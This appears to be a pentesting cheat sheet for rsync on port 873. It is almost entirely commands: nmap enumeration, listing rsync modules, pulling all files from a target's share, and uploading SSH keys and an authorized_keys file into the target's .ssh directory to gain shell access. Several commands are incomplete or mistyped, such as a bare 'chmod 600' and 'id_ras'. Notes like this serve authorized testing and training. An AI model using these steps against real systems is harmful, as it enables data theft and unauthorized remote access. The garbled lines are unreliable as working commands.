Skip to content

873 - Pentesting rsync

Rsync is a fast and versatile file synchronization and backup utility for Unix-based systems. It allows users to synchronize files between two or more systems over a network, either by copying files from one system to another or by updating only the files that have changed.


sudo nmap -p 873 -A $IP
sudo nmap -sV --script "rsync-list-modules" -p 873 $(target)


rsync -av --list-only rsync://<user>@$(target)/<dir_name>
copy all files to local machine
rsync -av rsync://rsync-connect@$(target)/files /home/kali/workspace/rsyn_files
upload files to remove machine*
chmod 600 id_ras
chmod 600
rsync -av /home/kali/workspace/.ssh/id_rsa rsync://rsync-connect@$(target)/files/sys-internal/.ssh/
rsync -av /home/kali/workspace/.ssh/ rsync://rsync-connect@$(target)/files/sys-internal/.ssh/
cat | tee authorized_keys
chmod 600 id_ras
chmod 600
chmod 600 authorized_keys
rsync -av /home/kali/workspace/.ssh/authorized_keys rsync://rsync-connect@$(target)/files/sys-internal/.ssh/